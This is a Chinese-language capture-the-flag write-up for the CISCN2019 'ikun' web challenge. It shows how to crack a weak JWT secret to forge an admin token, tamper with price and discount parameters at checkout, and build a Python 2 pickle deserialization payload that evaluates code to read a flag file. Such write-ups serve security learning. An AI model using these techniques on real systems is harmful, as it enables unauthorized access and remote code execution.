[CISCN2019 华北赛区 Day1 Web2]ikun
[CISCN2019 华北赛区 Day1 Web2]ikun
考点
JWT
逻辑漏洞
tornado代码审计
pickle反序列化
wp
注册登录,提示剩余金额1000,并且在cookie中有JWT字段
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhYWEifQ.bJejEdbt0h9U-vvnfoUAF7JFOPy0o6LqHQnITMhYL2I
在jwt.io上看一下,提示需要密钥

可以使用jwtcrack
破解密钥,结果是1Kun,username改成admin,重新生成JWT
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo
回到个人中心,可以看到提示

>>> s='\\u8fd9\\u7f51\\u7ad9\\u4e0d\\u4ec5\\u53ef\\u4ee5\\u4ee5\\u8585\\u7f8a\\u6bdb\\uff0c\\u6211\\u8fd8\\u7559\\u4e86\\u4e2a\\u540e\\u95e8\\uff0c\\u5c31\\u85cf\\u5728\\u006c\\u0076\\u0036\\u91cc'
>>> s.encode('utf8').decode('unicode_escape')
'这网站不仅可以以薅羊毛,我还留了个后门,就藏在lv6里'
然后找lv6在哪儿,写爬虫爆破,在181页
import requests
url = 'http://d34fe1a5-ca55-4b0b-9f8e-52d8f8a89f48.node4.buuoj.cn:81/shop?page=2'
for i in range(1,999999):
url = f'http://d34fe1a5-ca55-4b0b-9f8e-52d8f8a89f48.node4.buuoj.cn:81/shop?page={str(i)}'
r = requests.get(url)
if '/static/img/lv/lv6' in r.text:
print(url)
break

给的钱不够,应该是个逻辑漏洞,抓包看看,在结算的时候,有个折扣的参数,这里是打了8折

把price和discount都改成很低,看到返回了一个地址:/b1g_m4mber

直接访问可以看到提示,给了源码

static/asd1f654e683wq/www.zip
下载源码,直接找路由吧,在sshop/views/__init__.py
文件下
handlers = [
(r'/', ShopIndexHandler),
(r'/shop', ShopListHandler),
(r'/info/(\d+)', ShopDetailHandler),
(r'/shopcar', ShopCarHandler),
(r'/shopcar/add', ShopCarAddHandler),
(r'/pay', ShopPayHandler),
(r'/user', UserInfoHandler),
(r'/user/change', changePasswordHandler),
(r'/pass/reset', ResetPasswordHanlder),
(r'/login', UserLoginHanlder),
(r'/logout', UserLogoutHandler),
(r'/register', RegisterHandler),
(r'/b1g_m4mber', AdminHandler)
]
发现在AdminHandler
中调用了pickle.loads
,由此切入
class AdminHandler(BaseHandler):
@tornado.web.authenticated
def get(self, *args, **kwargs):
if self.current_user == "admin":
return self.render('form.html', res='This is Black Technology!', member=0)
else:
return self.render('no_ass.html')
@tornado.web.authenticated
def post(self, *args, **kwargs):
try:
become = self.get_argument('become')
p = pickle.loads(urllib.unquote(become))
return self.render('form.html', res=p, member=1)
except:
return self.render('form.html', res='This is Black Technology!', member=0)
pickle.loads
把字符串转换成对象,get_argument
用于获取GET或POST的参数,urllib.unquote
是python2的用法,然后就可以构造pickle反序列化了
# python2
import pickle
import urllib
class payload(object):
def __reduce__(self):
return (eval, ("open('/flag.txt','r').read()",))
a = pickle.dumps(payload())
a = urllib.quote(a)
print a
得到结果
c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.
回到/b1g_m4mber
,把输入框的hidden
删掉

提交payload

结果

小结
破解JWT的密钥可以使用jwtcrack,在kali中使用
最后更新于